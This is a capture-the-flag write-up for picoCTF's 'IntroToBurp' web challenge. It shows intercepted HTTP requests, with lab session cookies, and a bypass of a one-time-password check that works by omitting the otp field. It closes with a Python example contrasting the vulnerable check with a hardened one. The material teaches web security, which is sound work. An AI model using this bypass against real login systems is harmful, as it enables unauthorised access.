IntroToBurp

Challenge information

Level: Easy
Tags: picoCTF 2024, Web Exploitation
Author: NANA AMA ATOMBO-SACKEY & SABINE GISAGARA

Description:
Try here to find the flag

Hints:
1. Try using burpsuite to intercept the request to capture the flag.
2. Try mangling the request, maybe their server-side code doesn't handle
   malformed requests very well.

Challenge link: https://play.picoctf.org/practice/challenge/419

Solution

Analyse the web site

Browse to the web site and you will see a registration web page with five text boxes and a Register button.

Start Burp Suite and configure your browser to use Burp as its proxy. Then set 'Intercept' to off under the Proxy -> Intercept tab (the requests are still logged under Proxy -> HTTP history).

Next, we register some bogus information on the web page and let Burp catch the request, which looks like this:

POST / HTTP/1.1
Host: titan.picoctf.net:59762
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://titan.picoctf.net:59762/
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Origin: http://titan.picoctf.net:59762
DNT: 1
Connection: keep-alive
Cookie: session=.eJw1jcsKwjAQRX9Fsu7CpHnpB_gDxXVokiktzaMkKSLivzsV3Z17LnfmRdzSnuRKhpbdOucQSUdcLZNpeYWEBQUvuHVcT1ppBkpZKdioLAjbq9477h1jkl5wN-0hmDRGwNkN-fTljuS2oRGcaXrGuI21PnLx6AK0CEs65JwTmLRHC-X4ynoupMJir1B-N-9_fH8AZl045Q.ZmbzvA.b9WKQbgaex2C-M19mGpLM2OMMYw
Upgrade-Insecure-Requests: 1
Priority: u=1

csrf_token=IjFlZDU0YmM0OGY4NzgyZTc3YjY1MmE3YmU1YjM3M2RjNGRjMjI2MTki.Zmb14Q.m0F_00t8_d03iaIal1cDYGISH7Y&full_name=A&username=B&phone_number=C&city=D&password=E&submit=Register

After submitting the registration data you are redirected to a /dashboard page which wants a 2FA value.
Submit any bogus data here.

This request looks like this:

POST /dashboard HTTP/1.1
Host: titan.picoctf.net:59762
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://titan.picoctf.net:59762/dashboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Origin: http://titan.picoctf.net:59762
DNT: 1
Connection: keep-alive
Cookie: session=.eJwti8sOwiAQAP9lzx6EQhe9afU7CI8lGltooMQY47-7Jt5mJpk3hPv2giNcYAeh1WS38qDMQVDUygdlkkEjCdGPWjr0pP2AQwwqBilHceAv9Xm22S3E24m9bCsTCmlwz7q61p6lRm7Xn95KJpv74qlymjj1RvX_n-HzBaDgK5c.Zmb6Dw.kY8tuOGUScAGpfmmCA7JVYn5T6E
Upgrade-Insecure-Requests: 1
Priority: u=1

otp=bogus

The result is a web page displaying Invalid OTP.

Get the flag

To get the flag we need to manipulate the POST request to /dashboard.
Under the Proxy -> HTTP history tab, right-click on this POST request and choose 'Send to Repeater'.
Then navigate to the Repeater tab.

Rename the otp parameter in the request body to something else and give it any value, so that no otp field is sent at all.
Then send the request.

I used the following request:

<---Unchanged data removed for readability--->
Upgrade-Insecure-Requests: 1
Priority: u=1

bogus=4711

And got this reply back:

HTTP/1.1 200 OK
Server: Werkzeug/3.0.1 Python/3.8.10
Date: Mon, 10 Jun 2024 13:15:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102
Vary: Cookie
Connection: close

Welcome, B you sucessfully bypassed the OTP request. 
Your Flag: picoCTF{<REDACTED>}
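The bypass works because the server only rejects a wrong OTP when the otp field is actually present; a body that omits the field is treated as valid. The challenge's real server code is not shown in this writeup, so the following is an added, constructed Python example (not the challenge's code) that reproduces that failure mode next to a hardened check. The EXPECTED_OTP value, the function names and the sample bodies are all assumptions made for illustration.

```python
import hmac
from urllib.parse import parse_qs

# Constructed value for the example; the real challenge's OTP is not on the page.
EXPECTED_OTP = "123456"


def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into single-valued fields.

    keep_blank_values=True so that 'otp=' is seen as a present-but-empty field
    rather than silently dropped.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def verify_otp_vulnerable(body: str) -> bool:
    """Hypothetical vulnerable pattern (constructed, not the challenge's code).

    The check only fires when an 'otp' field exists and is wrong, so a body such
    as 'bogus=4711' that carries no otp field at all falls through to success.
    """
    form = parse_form(body)
    if "otp" in form and form["otp"] != EXPECTED_OTP:
        return False
    return True


def verify_otp_fixed(body: str) -> bool:
    """Hardened check: the field must be present, well-formed, and match.

    Missing or malformed input is a failure, never a pass, and the comparison is
    constant-time so the check does not leak timing information.
    """
    form = parse_form(body)
    submitted = form.get("otp")
    if submitted is None:
        return False  # field absent: reject instead of skipping the check
    if not (submitted.isdigit() and len(submitted) == 6):
        return False  # wrong shape: reject before comparing
    return hmac.compare_digest(submitted, EXPECTED_OTP)


if __name__ == "__main__":
    for body in ("otp=bogus", "bogus=4711", "otp=", "otp=123456"):
        print(f"{body!r:14} vulnerable={verify_otp_vulnerable(body)!s:5} "
              f"fixed={verify_otp_fixed(body)}")
```

The defensive takeaway is the shape of the condition: any authentication check written as "reject if the field is present and wrong" should be rewritten as "accept only if the field is present and right", with every other path ending in rejection.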

For additional information, please see the references below.

References